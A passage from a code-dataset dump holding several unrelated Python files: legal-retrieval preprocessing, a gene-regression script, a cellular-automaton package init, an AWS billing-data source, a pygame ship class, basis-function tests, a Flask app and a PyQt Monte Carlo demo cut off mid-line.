sub_ids.append(sub_idx)\n tokenized_texts.append(tokenized_text)\n lengths.append(tokenized_len)\n bm25texts.append(bm25_process(processed_text, f))\n sub_idx +=1\n \n idx += 1\n \n df = pd.DataFrame()\n df[\"id\"] = ids\n df[\"law_id\"] = law_ids\n df[\"article_id\"] = article_ids\n df[\"text_id\"] = text_ids\n df[\"title\"] = titles\n df[\"text\"] = texts\n df[\"processed_text\"] = processed_texts\n df[\"sub_id\"] = sub_ids\n df[\"tokenized_text\"] = tokenized_texts\n df[\"bm25text\"] = bm25texts\n df[\"len\"] = lengths\n \n return df\n\ndef build_qa(f, df, qa_file, split = False):\n \"\"\"\n Build a question-answer dataframe\n \"\"\"\n text_ids = df[\"text_id\"].tolist()\n titles = df[\"title\"].tolist()\n texts = df[\"text\"].tolist()\n lengths = df[\"len\"].tolist()\n sub_ids = df[\"sub_id\"].tolist()\n q_texts = []\n q_processed_texts = []\n q_tokenized_texts = []\n q_bm25texts = []\n q_lens = []\n no_ans = []\n ans_ids = []\n ans_text_ids = []\n ans_titles = []\n ans_texts = []\n ans_lens = []\n ans_sub_ids = []\n with open (qa_file, 'r') as input:\n data = json.load(input)\n \n if not split:\n for item in data['items']:\n question = item[\"question\"]\n q_texts.append(question)\n q_processed_text = preprocess_question(question, remove_end_phrase=False)\n q_processed_texts.append(q_processed_text)\n q_tokenized_text = tokenise(q_processed_text, f)\n q_tokenized_texts.append(q_tokenized_text)\n 
q_bm25texts.append(bm25_process(q_processed_text, f))\n q_lens.append(length(q_tokenized_text))\n ans_text_id = \"\"\n ans_id = \"\"\n ans_title = \"\"\n ans_text = \"\"\n ans_len = \"\"\n ans_count = 0\n ans_sub_id = []\n for i in range(len(item['relevant_articles'])):\n ans_count += 1\n atext_id = item['relevant_articles'][i]['law_id'] + \"_\" + item['relevant_articles'][i]['article_id']\n a_id = text_ids.index(atext_id)\n ans_text_id += atext_id\n ans_id += str(a_id)\n ans_title += titles[a_id]\n ans_text += texts[a_id]\n ans_len += str(lengths[a_id])\n sub_id = sub_ids[a_id]\n ans_sub_id += sub_id\n \n if i < len(item[\"relevant_articles\"]) - 1:\n ans_text_id += \", \"\n ans_id += \", \"\n ans_title += \", \"\n ans_text += \", \"\n ans_len += \", \"\n \n no_ans.append(ans_count)\n ans_text_ids.append(ans_text_id)\n ans_ids.append(ans_id)\n ans_titles.append(ans_title)\n ans_texts.append(ans_text)\n ans_lens.append(ans_len)\n ans_sub_ids.append(ans_sub_id)\n else:\n for item in data['items']:\n question = item[\"question\"]\n for article in item['relevant_articles']:\n q_texts.append(question)\n q_processed_text = preprocess_question(question, remove_end_phrase=False)\n q_processed_texts.append(q_processed_text)\n q_tokenized_text = tokenise(q_processed_text, f)\n q_tokenized_texts.append(q_tokenized_text)\n q_bm25texts.append(bm25_process(q_processed_text, f))\n q_lens.append(length(q_tokenized_text)) \n ans_text_id = article['law_id'] + \"_\" + article['article_id']\n ans_text_ids.append(ans_text_id)\n a_id = text_ids.index(ans_text_id)\n ans_ids.append(a_id)\n ans_titles.append(titles[a_id])\n ans_texts.append(texts[a_id])\n ans_lens.append(lengths[a_id])\n ans_sub_ids.append(sub_ids[a_id])\n \n \n df = pd.DataFrame()\n df[\"question\"] = q_texts\n df[\"processed_question\"] = q_processed_texts\n df[\"tokenized_question\"] = q_tokenized_texts\n df[\"bm25_question\"] = q_bm25texts\n df[\"ques_len\"] = q_lens\n if not split:\n df['no_ans'] = no_ans\n df[\"ans_text_id\"] = ans_text_ids\n df[\"ans_id\"] = ans_ids\n df[\"ans_title\"] = ans_titles\n df[\"ans_text\"] = ans_texts\n df[\"ans_len\"] = ans_lens\n df[\"ans_sub_id\"] = ans_sub_ids\n \n return df\n\ndef build_biencoder_data(dqa_split, bm25, set_ques, no_hneg, no_search):\n \"\"\"\n Build train, val, test, dataframe used for biencoder training\n \"\"\"\n qa_ids = []\n neg_ids = []\n search_ids = []\n q_texts = dqa_split['question'].tolist()\n q_bm25texts = dqa_split['bm25_question'].tolist()\n count = 0\n ans_ids = dqa_split['ans_id'].tolist()\n ids = [i for i in range(bm25.corpus_size)]\n for i in range(len(q_texts)):\n if q_texts[i] in set_ques:\n qa_ids.append(i)\n q_bm25 = q_bm25texts[i].split(\" \")\n bm25_ids = bm25.get_top_n(q_bm25, ids, n=no_search)\n if ans_ids[i] in bm25_ids:\n count += 1\n \n neg = bm25_ids[:(no_hneg+1)]\n if ans_ids[i] in neg:\n neg.remove(ans_ids[i])\n \n neg = neg[:no_hneg]\n neg_ids.append(neg)\n search_ids.append(bm25_ids)\n print(count/len(qa_ids)) \n df = dqa_split.loc[qa_ids]\n df['neg_ids'] = neg_ids\n df['search_ids'] = search_ids\n return df\n\ndef build_short_data(df, dcorpus, limited_length = 234):\n \"\"\"\n Build short data\n \"\"\"\n ids = [i for i in range(len(df)) if dcorpus['len'][df['ans_id'][i]] <= limited_length]\n dshort = df.loc[ids].copy(deep= True).reset_index(drop=True)\n return dshort\n\ndef build_general_data(dqa, bm25, set_ques, no_hneg, no_search):\n \"\"\"\n Build general train, test, val dataframe\n \"\"\"\n qa_ids = []\n neg_ids = []\n search_ids = []\n q_texts = 
dqa['question'].tolist()\n q_bm25texts = dqa['bm25_question'].tolist()\n ans_ids = dqa['ans_id'].tolist()\n ids = [i for i in range(bm25.corpus_size)]\n count = 0\n \n for i in range(len(q_texts)):\n if q_texts[i] in set_ques:\n qa_ids.append(i)\n q_bm25 = q_bm25texts[i].split(\" \")\n ans_id = [int(x) for x in ans_ids[i].split(\", \")]\n bm25_ids = bm25.get_top_n(q_bm25, ids, n= no_search)\n search_ids.append(bm25_ids)\n \n for a_id in ans_id:\n if a_id in bm25_ids:\n bm25_ids.remove(a_id)\n neg_id = bm25_ids[:no_hneg]\n neg_ids.append(neg_id)\n if len(bm25_ids) == (no_search - len(ans_id)):\n count += 1 \n \n df = dqa.loc[qa_ids]\n df['neg_ids'] = neg_ids\n df['search_ids'] = search_ids\n print(count/len(qa_ids))\n return df","repo_name":"coangquang/legal_retrieval","sub_path":"src/dpr/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":23463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
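Note on the record above: its create_sliding_window helper chunks long tokenized texts into overlapping windows before indexing. A minimal standalone sketch of that windowing scheme, assuming whitespace-separated tokens (the function name here is illustrative, not from the repo):

import math

def sliding_windows(words, size=200, overlap=64):
    # Consecutive windows start `size - overlap` tokens apart, so each
    # window shares `overlap` tokens with its predecessor.
    step = size - overlap
    n_windows = math.ceil(len(words) / step)
    return [" ".join(words[i * step : i * step + size]) for i in range(n_windows)]

# sliding_windows("a b c d e".split(), size=3, overlap=1) -> ['a b c', 'c d e', 'e']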
+{"seq_id":"72290021541","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 29 16:36:09 2020\r\n\r\n@author: LilyHeAsamiko\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn import preprocessing\r\nfrom scipy import stats\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n#regression on TF\r\ndataset = pd.read_csv(r'/Users/he/Downloads/WiML-master/MAdata_DGinMCout.txt',sep='\\t', header = 0)\r\norigindata = np.exp(dataset)\r\ndataset1 = pd.read_csv(r'/Users/he/Downloads/WiML-master/raw_data_DGinMCout.tsv',sep='\\t', header = 0)\r\nfadata = pd.read_csv(r'/Users/he/Downloads/WiML-master/Alignment_for_family_PTHR11679_SF35.txt',sep='\\t', header = 0)\r\n\r\n#X = origindata\r\n#X.iloc[0:25,0] = dataset1.iloc[0:25,5]\r\n#X.iloc[0:25,1] = dataset1.iloc[25:50,5]\r\n#X.iloc[0:25,2] = dataset1.iloc[50:75,5]\r\nX= np.zeros((np.shape(dataset)))\r\nX[0:25,0] = dataset1.iloc[0:25,5]\r\nX[0:25,1] = dataset1.iloc[25:50,5]\r\nX[0:25,2] = dataset1.iloc[50:75,5]\r\n\r\nN,c = np.shape(origindata)\r\n#compare V1: dg_v, V2: dg_c\r\nbeta = np.dot(X.T,origindata)/N\r\nbeta = np.array(beta)\r\nbeta0 = beta\r\nsteps = 100\r\nbtemp = 0.1\r\ndb = 0.1\r\nlse = np.ones(np.shape(origindata))*10**5\r\nres = np.zeros((c,steps))\r\n#regression\r\nfor b in range(c):\r\n for s in range(steps):\r\n# temp = btemp*X.iloc[:,b]\r\n# temp = np.unique((np.array(origindata.iloc[:,b]).reshape(N,1)-temp.reshape(N,1)-np.random.normal(0,1,N).reshape(N,1)))**2\r\n# temp = np.array(btemp*X[:,b])\r\n# temp = (np.array(origindata.iloc[:,b])-temp-np.random.normal(0,1,N).T)**2\r\n e = np.random.normal(0,1,N).T\r\n temp = (np.array(origindata.iloc[:,b])-np.array(btemp*X[:,b])-e)**2\r\n temp[np.isnan(temp)]=0\r\n# if sum(temp.reshape(N,1) - lse.reshape(N,1))<0:\r\n if sum(temp - lse[:,b])<0:\r\n beta[b,b] = btemp\r\n btemp += db\r\n lse[:,b] = temp \r\n res[b,s] = np.sqrt(sum(lse[:,b])/N)\r\n else:\r\n btemp = (btemp +db)/2\r\n e = np.random.normal(0,1,N).T\r\n temp= (np.array(origindata.iloc[:,b])-np.array(btemp*X[:,b])-e)**2\r\n if sum(temp - lse[:,b])<0:\r\n beta[b,b] = btemp\r\n btemp += db\r\n lse[:,b] = temp \r\n res[b,s] = np.sqrt(sum(lse[:,b])/N)\r\n else:\r\n res[b,s] = np.sqrt(res[b,s-1]/N)\r\n # temp[np.isnan(temp)]=0\r\n# res[b,s] = np.mean(res[b,0:s-1]/s)\r\nC = np.corrcoef(X,X)\r\nplt.pcolor(C[0:25,0:25])\r\nplt.title('correlation of three cells TF')\r\nLD = np.zeros((np.shape(origindata)))\r\n#LD score:\r\nfor i in range(c):\r\n LD[:,i] = origindata.iloc[:,i]**2+origindata.iloc[:,i]*origindata.iloc[:,np.mod(i+1,3)]+origindata.iloc[:,i]*origindata.iloc[:,np.mod(i+2,3)]\r\nplt.pcolor(LD)\r\nplt.title('LD_Score of three cells TF')\r\n \r\nplt.scatter(origindata, np.dot(X,beta))\r\nplt.title('three cells TF regression')\r\n\r\n\r\n#Compare enrichment of fa dataset(as the sequence is not complete but only alignment data, there we compare enrichment only on family fasta sequence)\r\nStr_Tnig = np.array(fadata.iloc[0:125],dtype = str)\r\nStr_Onil = np.array(fadata.iloc[127:252],dtype = str)\r\n#Common allele:\r\nrows = np.shape(Str_Onil)[0] \r\ncols = len(str(Str_Onil[0,:]))\r\nco = np.zeros((rows, cols))\r\ncE = 0\r\nS = ['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V']\r\nfor i in range(np.shape(Str_Onil)[0]):\r\n co[i,:] = str(Str_Onil[i,:])==str(Str_Tnig[i,:])\r\n cE += sum(co[i,:]>0)\r\nM = rows*cols \r\nEnrichment_Tnig_Onil = np.zeros((rows, 2,2))\r\nTnigID = np.zeros((rows, cols,len(S)))\r\nOnilID = TnigID \r\nfor i in 
range(rows):\r\n for s in range(len(S)):\r\n# TnigID[i,:,s] = str(Str_Tnig[i,:])[~co[i,:]]==S[s]\r\n# OnilID[i,:,s] = str(Str_Onil[i,~co[i,:]]==S[s]\r\n# OnilID[i,:,s] = str(Str_Onil[i,:])[~co[i,:]]==S[s]\r\n #temp1 = str(Str_Tnig[i,])[:]\r\n TnigID[i,:,s] = str(Str_Tnig[i,]).find(S[s])\r\n #print(len(temp1))\r\n #temp2 = str(Str_Onil[i,])[:]\r\n #print(len(temp2))\r\n OnilID[i,:,s] = str(Str_Onil[i,]).find(S[s])\r\n #tempTid = TnigID[i,:,s]>=0\r\n #tempOid = OnilID[i,:,s]>=0\r\n #tempc = np.corrcoef(TnigID[i,tempTid,s],OnilID[i,tempOid,s])\r\n #tempc[np.isnan(tempc)] = 0\r\n #Enrichment_Tnig_Onil[i,s,:,:] = tempc\r\n tempTid = TnigID[i,:,:]>=0\r\n tempOid = OnilID[i,:,:]>=0\r\n tempc = np.corrcoef(TnigID[i,tempTid],OnilID[i,tempOid])\r\n tempc[np.isnan(tempc)] = 0\r\n Enrichment_Tnig_Onil[i,:,:] = tempc\r\n\r\n#fig = plt.figure()\r\n#ax = fig.add_subplot(111,projection = '3d')\r\n#ax.scatter(np.linspace(0,2,10),np.linspace(0,2,10),Enrichment_Tnig_Onil.T)\r\nEnrichment1 = sum(Enrichment_Tnig_Onil[Enrichment_Tnig_Onil>0]**2)/cE/((sum(Enrichment_Tnig_Onil[Enrichment_Tnig_Onil<=0]**2))/(rows*cols-cE)+1)","repo_name":"LilyHeAsamiko/neurocomputation","sub_path":"Regulatory elements inferenced by TF/LD.py","file_name":"LD.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"8125726812","text":"# -*- coding: utf-8 -*-\n\"\"\"\nXentica core functionality is available via modules from this package.\n\nIn addition, you may use ``core`` package as a shortcut to the main\nclasses of the framework.\n\n- **Base classes**\n - ``core.CellularAutomaton`` →\n :class:`xentica.core.base.CellularAutomaton`\n - ``core.Experiment`` →\n :class:`xentica.core.experiment.Experiment`\n\n- **Lattices**\n - ``core.OrthogonalLattice`` →\n :class:`xentica.core.topology.lattice.OrthogonalLattice`\n\n- **Neighborhoods**\n - ``core.MooreNeighborhood`` →\n :class:`xentica.core.topology.neighborhood.MooreNeighborhood`\n - ``core.VonNeumannNeighborhood`` →\n :class:`xentica.core.topology.neighborhood.VonNeumannNeighborhood`\n\n- **Borders**\n - ``core.TorusBorder`` →\n :class:`xentica.core.topology.border.TorusBorder`\n - ``core.StaticBorder`` →\n :class:`xentica.core.topology.border.StaticBorder`\n\n- **Properties**\n - ``core.IntegerProperty`` →\n :class:`xentica.core.properties.IntegerProperty`\n - ``core.FloatProperty`` →\n :class:`xentica.core.properties.FloatProperty`\n - ``core.TotalisticRuleProperty`` →\n :class:`xentica.core.properties.TotalisticRuleProperty`\n - ``core.RandomProperty`` →\n :class:`xentica.core.properties.RandomProperty`\n\n- **Parameters**\n - ``core.Parameter`` →\n :class:`xentica.core.parameters.Parameter`\n\n- **Variables**\n - ``core.IntegerVariable`` →\n :class:`xentica.core.variables.IntegerVariable`\n - ``core.FloatVariable`` →\n :class:`xentica.core.variables.FloatVariable`\n\nThe classes listed above are all you need to build CA models and\nexperiments with Xentica, unless you are planning to implement custom\ncore features like new lattices, borders, etc.\n\n\"\"\"\nfrom xentica.core.base import CellularAutomaton\nfrom xentica.core.properties import (\n IntegerProperty,\n FloatProperty,\n TotalisticRuleProperty,\n RandomProperty,\n)\nfrom xentica.core.variables import (\n IntegerVariable, FloatVariable,\n)\nfrom xentica.core.parameters import (\n Parameter,\n)\nfrom xentica.core.topology.lattice import (\n OrthogonalLattice,\n)\nfrom xentica.core.topology.neighborhood import (\n MooreNeighborhood, VonNeumannNeighborhood\n)\nfrom xentica.core.topology.border import (\n TorusBorder, StaticBorder,\n)\nfrom xentica.core.experiment import Experiment\n\n__all__ = [\n 'CellularAutomaton',\n 'IntegerProperty',\n 'FloatProperty',\n 'TotalisticRuleProperty',\n 'RandomProperty',\n 'Parameter',\n 'IntegerVariable',\n 'FloatVariable',\n 'OrthogonalLattice',\n 'MooreNeighborhood',\n 'VonNeumannNeighborhood',\n 'TorusBorder',\n 'StaticBorder',\n 'Experiment',\n]\n","repo_name":"a5kin/xentica","sub_path":"xentica/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"35"}
+{"seq_id":"40702347756","text":"import datetime\nimport time\n\nimport pandas as pd\n\nfrom bill_calculator_hep.AWSBillAnalysis import AWSBillCalculator\n\nfrom decisionengine.framework.modules import Source\nfrom decisionengine.framework.modules.Source import Parameter\nfrom decisionengine_modules.AWS.sources import DEAccountContants\n\n\n@Source.supports_config(\n Parameter(\n \"billing_configuration\",\n type=dict,\n comment=\"\"\"Configuration required to get AWS billing information. Supports the layout:\n\n {\n 'AWSRnDAccountConstants': {\n 'lastKnownBillDate': '08/01/16 00:00', # '%m/%d/%y %H:%M'\n 'balanceAtDate': 3839.16, # $\n 'accountName': 'RnD',\n 'accountNumber': 159067897602,\n 'credentialsProfileName': 'BillingRnD',\n 'applyDiscount': True, # DLT discount does not apply to credits\n 'costRatePerHourInLastSixHoursAlarmThreshold': 2, # $ / h # $10/h\n 'costRatePerHourInLastDayAlarmThreshold': 2, # $ / h # $10/h\n 'emailReceipientForAlarms': 'fermilab-cloud-facility-rnd@fnal.gov'\n }\n }\"\"\",\n ),\n Parameter(\"dst_dir_for_s3_files\", type=str, comment=\"Directory for AWS billing files\"),\n Parameter(\"verbose_flag\", type=bool),\n)\n@Source.produces(AWS_Billing_Info=pd.DataFrame, AWS_Billing_Rate=pd.DataFrame)\nclass BillingInfo(Source.Source):\n def __init__(self, config):\n super().__init__(config)\n acconts_config_file = config[\"billing_configuration\"]\n self.billing_files_location = config[\"dst_dir_for_s3_files\"]\n self.verbose_flag = int(config[\"verbose_flag\"])\n # Load known accounts configuration\n account_dict = DEAccountContants.load_constants(acconts_config_file)\n self.accounts = []\n for val in account_dict.values():\n self.accounts.append(DEAccountContants.AccountConstants(val))\n\n def acquire(self):\n \"\"\"\n Method to be called from Task Manager.\n redefines acquire from Source.py\n Acquire AWS billing info and return as pandas frame\n\n :rtype: :obj:`~pd.DataFrame`\n \"\"\"\n\n # get data for all accounts\n self.logger.debug(\"in BillingInfo acquire\")\n data = []\n datarate = []\n globalConf = {\n \"graphite_host\": \"dummy\",\n \"graphite_context_billing\": \"dummy\",\n \"outputPath\": self.billing_files_location,\n \"accountDirs\": 1,\n }\n for i in self.accounts:\n constantsDict = {\n \"credentialsProfileName\": i.credentialsProfileName,\n \"accountNumber\": i.accountNumber,\n \"bucketBillingName\": i.bucketBillingName,\n \"lastKnownBillDate\": i.lastKnownBillDate,\n \"balanceAtDate\": i.balanceAtDate,\n \"applyDiscount\": i.applyDiscount,\n }\n try:\n calculator = AWSBillCalculator(i.accountName, globalConf, constantsDict, self.logger)\n lastStartDateBilledConsideredDatetime, CorrectedBillSummaryDict = calculator.CalculateBill()\n self.logger.debug(f\"lastStartDateBilledConsideredDatetime: {lastStartDateBilledConsideredDatetime}\")\n self.logger.debug(f\"CorrectedBillSummaryDict: {CorrectedBillSummaryDict}\")\n # data is a list, CorrectedBillSummaryDict is a dict, so we have to append it as a list of dict.\n # data += calculator.CorrectedMonthlyBillSummaryList\n data += [CorrectedBillSummaryDict]\n #\n # This is the code to calculate 6hr and 24hr spend rate\n dateNow = datetime.datetime.today()\n # Get cost in the last 6 hours\n sixHoursBeforeLastDateBilledDatetime = lastStartDateBilledConsideredDatetime - datetime.timedelta(\n hours=6\n )\n calculator.setLastKnownBillDate(sixHoursBeforeLastDateBilledDatetime.strftime(\"%m/%d/%y %H:%M\"))\n newLastStartDateBilledDatetime, CorrectedBillSummarySixHoursBeforeDict = calculator.CalculateBill()\n 
costInLastSixHours = CorrectedBillSummarySixHoursBeforeDict[\"Total\"]\n costRatePerHourInLastSixHours = costInLastSixHours / 6\n # Get cost in the last 24 hours\n oneDayBeforeLastDateBilledDatetime = lastStartDateBilledConsideredDatetime - datetime.timedelta(\n hours=24\n )\n calculator.setLastKnownBillDate(oneDayBeforeLastDateBilledDatetime.strftime(\"%m/%d/%y %H:%M\"))\n newLastStartDateBilledDatetime, CorrectedBillSummaryOneDayBeforeDict = calculator.CalculateBill()\n\n costInLastDay = CorrectedBillSummaryOneDayBeforeDict[\"Total\"]\n costRatePerHourInLastDay = costInLastDay / 24\n dataDelay = int(\n (time.mktime(dateNow.timetuple()) - time.mktime(lastStartDateBilledConsideredDatetime.timetuple()))\n / 3600\n )\n\n dataratedict = {\n \"accountName\": i.accountName,\n \"lastStartDateBilledConsideredDatetime\": lastStartDateBilledConsideredDatetime,\n \"dataDelay\": dataDelay,\n \"costInLastSixHours\": costInLastSixHours,\n \"costInLastDay\": costInLastDay,\n \"costRatePerHourInLastSixHours\": costRatePerHourInLastSixHours,\n \"costRatePerHourInLastDay\": costRatePerHourInLastDay,\n }\n datarate += [dataratedict]\n if self.verbose_flag:\n self.logger.debug(\"---\")\n self.logger.debug(\n f\"Alarm Computation for {calculator.accountName} Account Finished at {time.strftime('%c')}\"\n )\n self.logger.debug(\"\")\n self.logger.debug(\n f\"Last Start Date Billed Considered: {lastStartDateBilledConsideredDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(f\"Now {dateNow.strftime('%m/%d/%y %H:%M')}\")\n self.logger.debug(f\"delay between now and Last Start Date Billed Considered in hours {dataDelay}\")\n self.logger.debug(\n f\"Six hours before that: {sixHoursBeforeLastDateBilledDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(\n f\"One day before that: {oneDayBeforeLastDateBilledDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(\n f\"Adjusted Total Now from Date of Last Known Balance: ${CorrectedBillSummaryDict['Total']}\"\n )\n self.logger.debug(\"\")\n self.logger.debug(f\"Cost In the Last Six Hours: ${costInLastSixHours}\")\n self.logger.debug(f\"Cost Rate Per Hour In the Last Six Hours: ${costRatePerHourInLastSixHours} / h\")\n self.logger.debug(\"\")\n self.logger.debug(f\"Cost In the Last Day: ${costInLastDay}\")\n self.logger.debug(f\"Cost Rate Per Hour In the Last Day: ${costRatePerHourInLastDay} / h\")\n self.logger.debug(\"---\")\n self.logger.debug(\"\")\n\n except Exception as detail:\n self.logger.exception(\"Exception in AWS BillingInfo call to acquire\")\n raise Exception(detail)\n\n return {\"AWS_Billing_Info\": pd.DataFrame(data), \"AWS_Billing_Rate\": pd.DataFrame(datarate)}\n\n\nSource.describe(\n BillingInfo,\n sample_config={\n \"billing_configuration\": \"/etc/decisionengine/modules.conf/AccountConstants_my.py\",\n \"dst_dir_for_s3_files\": \"/var/lib/decisionengine/awsfiles\",\n },\n)\n","repo_name":"HEPCloud/decisionengine_modules","sub_path":"src/decisionengine_modules/AWS/sources/BillingInfo.py","file_name":"BillingInfo.py","file_ext":"py","file_size_in_byte":7821,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"33948648146","text":"import pygame\nfrom settings import Settings\n\nclass Ship:\n \"\"\"A class to manage the ship\"\"\"\n\n def __init__(self, galaga_game):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n self.screen = galaga_game.screen\n self.screen_rect = galaga_game.screen.get_rect()\n self.settings = galaga_game.settings\n self.galaga_game = galaga_game\n\n # Load ths ship image and get its rect\n self.image = pygame.image.load(self.settings.ship_image) \n self.rect = self.image.get_rect()\n\n # Start each new ship at the bottom center of the screen.\n self.rect.midbottom = self.screen_rect.midbottom\n\n # Move right flag; start with a ship that's not moving.\n self.moving_right = False \n self.moving_left = False\n\n def update(self):\n \"\"\"Update the ship's position based on the movement flag\"\"\"\n if self.moving_right:\n if self.rect.x <= self.galaga_game.screen_width - self.rect.width:\n self.rect.x += self.settings.ship_speed\n elif self.moving_left:\n if self.rect.x >= 0:\n self.rect.x -= self.settings.ship_speed\n\n def blitme(self):\n \"\"\"Draw the ship at its current location.\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def center_ship(self):\n \"\"\"Center the ship on the screen\"\"\"\n self.rect.midbottom = self.screen_rect.midbottom\n self.x = float(self.rect.x)\n\n\n ","repo_name":"daviddelavega/GalagaPythonGame","sub_path":"galaga/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"28968922841","text":"from unittest.case import SkipTest\n\nimport numpy as np\n\nfrom aspire.image import Image\nfrom aspire.utils import gaussian_2d, utest_tolerance\nfrom aspire.utils.coor_trans import grid_2d\nfrom aspire.utils.random import randn\n\n\nclass Steerable2DMixin:\n def testIndices(self):\n ell_max = self.basis.ell_max\n k_max = self.basis.k_max\n\n indices = self.basis.indices()\n\n i = 0\n\n for ell in range(ell_max + 1):\n if ell == 0:\n sgns = [1]\n else:\n sgns = [1, -1]\n\n for sgn in sgns:\n for k in range(k_max[ell]):\n self.assertTrue(indices[\"ells\"][i] == ell)\n self.assertTrue(indices[\"sgns\"][i] == sgn)\n self.assertTrue(indices[\"ks\"][i] == k)\n\n i += 1\n\n def testGaussianExpand(self):\n # Offset slightly\n x0 = 0.50\n y0 = 0.75\n\n # Want sigma to be as large as possible without the Gaussian\n # spilling too much outside the central disk.\n sigma = self.L / 8\n im1 = gaussian_2d(\n self.L, x0=x0, y0=y0, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype\n )\n\n coef = self.basis.expand(im1)\n im2 = self.basis.evaluate(coef)\n\n if isinstance(im2, Image):\n im2 = im2.asnumpy()\n im2 = im2[0]\n\n # For small L there's too much clipping at high freqs to get 1e-3\n # accuracy.\n if self.L < 32:\n atol = 1e-2\n else:\n atol = 1e-3\n\n self.assertTrue(im1.shape == im2.shape)\n self.assertTrue(np.allclose(im1, im2, atol=atol))\n\n def testIsotropic(self):\n sigma = self.L / 8\n im = gaussian_2d(self.L, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype)\n\n coef = self.basis.expand(im)\n\n ells = self.basis.indices()[\"ells\"]\n\n energy_outside = np.sum(np.abs(coef[ells != 0]) ** 2)\n energy_total = np.sum(np.abs(coef) ** 2)\n\n energy_ratio = energy_outside / energy_total\n\n self.assertTrue(energy_ratio < 0.01)\n\n def testModulated(self):\n if self.L < 32:\n raise SkipTest\n\n ell = 1\n\n sigma = self.L / 8\n im = gaussian_2d(self.L, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype)\n\n g2d = grid_2d(self.L)\n\n for trig_fun in (np.sin, np.cos):\n im1 = im * trig_fun(ell * g2d[\"phi\"])\n\n coef = self.basis.expand(im1)\n\n ells = self.basis.indices()[\"ells\"]\n\n energy_outside = np.sum(np.abs(coef[ells != ell]) ** 2)\n energy_total = np.sum(np.abs(coef) ** 2)\n\n energy_ratio = energy_outside / energy_total\n\n self.assertTrue(energy_ratio < 0.10)\n\n def testEvaluateExpand(self):\n coef1 = randn(self.basis.count, seed=self.seed)\n coef1 = coef1.astype(self.dtype)\n\n im = self.basis.evaluate(coef1)\n if isinstance(im, Image):\n im = im.asnumpy()\n coef2 = self.basis.expand(im)[0]\n\n self.assertTrue(coef1.shape == coef2.shape)\n self.assertTrue(np.allclose(coef1, coef2, atol=utest_tolerance(self.dtype)))\n\n def testAdjoint(self):\n u = randn(self.basis.count, seed=self.seed)\n u = u.astype(self.dtype)\n\n Au = self.basis.evaluate(u)\n if isinstance(Au, Image):\n Au = Au.asnumpy()\n\n x = randn(*self.basis.sz, seed=self.seed)\n x = x.astype(self.dtype)\n\n ATx = self.basis.evaluate_t(x)\n\n Au_dot_x = np.sum(Au * x)\n u_dot_ATx = np.sum(u * ATx)\n\n self.assertTrue(Au_dot_x.shape == u_dot_ATx.shape)\n self.assertTrue(np.isclose(Au_dot_x, u_dot_ATx))\n","repo_name":"yunpeng-shi/ASPIRE-Python","sub_path":"tests/_basis_util.py","file_name":"_basis_util.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"}
+{"seq_id":"31280609196","text":"import sys\nfrom flask import Flask, jsonify, request, render_template\nfrom build_graphs import build_graphs \n# testfile = \"/Users/main/Desktop/Coding/castle_dash_test/dashboard_challenge/castle_users.json\"\n\napp = Flask(__name__)\napp.config['PROPAGATE_EXCEPTIONS'] = True\n\n@app.route('/')\ndef home():\n\treturn render_template(\"index.html\")\n\nif __name__ == '__main__':\n\tinput = sys.argv[1]\n\tprint('input file name is ==>', input)\n\tbuild_graphs(input)\n\n\tapp.run(debug=True, use_reloader=False)\n","repo_name":"tsyaeger/cstl_dashboard","sub_path":"dashboard_challenge/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"30091726150","text":"from UI import Ui_Frame\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget\nfrom PyQt5.QtGui import QPainter, QBrush, QFont\nfrom PyQt5.QtCore import Qt, QRectF, QPoint, QRect\nimport sys, random, math\n\nclass Win(QMainWindow, Ui_Frame):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.clickfoo)\n self.valueIsSet = False\n\n def clickfoo(self):\n self.dataInit()\n self.monteCarlo()\n self.update()\n\n def dataInit(self):\n self.valueIsSet = True\n self.N = int(self.lineEdit.text())\n self.P = int(self.lineEdit_2.text())\n\n def monteCarlo(self):\n allPoint = [[random.uniform(0, 1), random.uniform(0, 1)]\n for i in range(self.N)]\n counter = 0\n self.underPoint = []\n self.upperPoint = []\n for point in allPoint:\n if point[1] <= math.pow(point[0], self.P):\n counter += 1\n self.underPoint.append(point)\n else:\n self.upperPoint.append(point)\n Area = counter / self.N\n self.label_3.setText(\"面積大約為{}\".format(Area))\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.setFont(QFont(\"Monospace\", 15))\n painter.setPen(Qt.white)\n painter.drawLine(600, 150, 1100, 150)\n painter.drawLine(600, 150, 600, 650)\n # draw Function\n if self.valueIsSet:\n for i in range(1000):\n tmp = i / 1000\n painter.drawPoint(600 + tmp * 500, 150 + math.pow(tmp, self.P) * 500)\n for point in self.underPoint:\n x = point[0]\n y = point[1]\n painter.drawPoint(600 + x * 